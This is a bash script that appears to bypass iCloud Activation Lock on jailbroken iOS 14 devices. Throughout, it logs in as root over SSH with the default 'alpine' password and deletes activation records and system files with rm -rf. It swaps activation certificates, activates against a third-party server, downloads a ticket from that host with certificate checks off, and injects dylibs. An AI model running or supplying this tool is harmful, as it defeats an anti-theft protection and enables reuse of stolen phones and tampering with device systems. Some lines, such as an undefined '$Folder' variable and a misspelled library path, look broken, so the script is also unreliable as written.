#!/bin/bash
folderSystem="/System/Library/PrivateFrameworks/MobileActivation.framework/Support/Certificates";
folderDaemon="/System/Library/LaunchDaemons";
folder="/Users/$(whoami)/Desktop/tmp";
folderBin="$Folder/libs";
$folderBin/iproxy 2222 22 &>log&rm ~/.ssh/known_hosts;
$folderBin/idevicepair pair;
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'mount -o rw,union,update /';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'snappy -f / -r `snappy -f / -l | sed -n 2p` -t orig-fs';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/libexec/substrate';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/libexec/substrated';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/bin/cycc';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/bin/cynject';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /./Library/Frameworks/*';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/lib/cycript0.9';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/lib/libsubstrate.dylib';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /Library/MobileSubstrate';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/include/substrate.h';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/lib/substrate';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chflags -R nouchg /private/var/containers/Data/System/*/Library/internal/../*';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /private/var/containers/Data/System/*/Library/activation_records/*';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chflags nouchg /private/var/wireless/Library/Preferences/com.apple.commcenter.device_specific_nobackup.plist';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chflags nouchg /private/var/mobile/Library/Preferences/com.apple.purplebuddy.plist';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /private/var/wireless/Library/Preferences/com.apple.commcenter.device_specific_nobackup.plist';
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/2" root@localhost:"/./MyUtils";
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/1" root@localhost:"/./re.tar.lzma";
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/lzma" root@localhost:"/./lzma";
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod +x /./lzma';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/./lzma -d -v /./re.tar.lzma';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'tar -xvf /./re.tar -C /./';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'tar -xvf /./MyUtils -C /./';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /./lzma /./re.tar /./MyUtils';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod -R 755 /bin /sbin /usr/bin /usr/sbin';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod 777 /usr/libexec/substrate* /usr/lib/libsusbtrate.dylib /usr/include/substrate.h';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrate';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrated';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'BasebandON';
$folderBin/ideviceactivation deactivate;
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/3" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/untethered.dylib";
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/4" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/untethered.plist";
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod 777 /Library/MobileSubstrate/DynamicLibraries/untethered.dylib';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'cp -rp /./System/Library/PrivateFrameworks/MobileActivation.framework/Support/Certificates/FactoryActivation.pem /./System/Library/PrivateFrameworks/MobileActivation.framework/Support/Certificates/RaptorActivation.pem';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl stop com.apple.mobileactivationd';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl start com.apple.mobileactivationd';
sleep 5;
$folderBin/ideviceactivation activate -d -s https://bigb033xecution3r.com/iOS14/Activation/ActivateDevice.php;
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrate';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrated';
$folderBin/idevicepair pair;
$folderBin/ideviceactivation activate -d -s https://bigb033xecution3r.com/iOS14/Activation/ActivateDevice.php;
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/untethered.dylib';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/untethered.plist';
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/5g" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/iuntethered.dylib";
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/6" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/iuntethered.plist";
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod 777 /Library/MobileSubstrate/DynamicLibraries/iuntethered.dylib';
curl -s -k "https://bigb033xecution3r.com/iOS14/Activation/Activation/$(DeviceInfo ProductType)/Wildcard.der" --output /Users/$(whoami)/Desktop/tmp/Wildcard.der;
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Wildcard.der" root@localhost:"/./ticket";
$folderBin/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/FastEditCenter" root@localhost:"/./usr/bin/FastEditCenter";
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod +x /usr/bin/FastEditCenter';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'FastEditCenter';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'killall CommCenter';
sleep 10;
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/iuntethered.dylib';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/iuntethered.plist';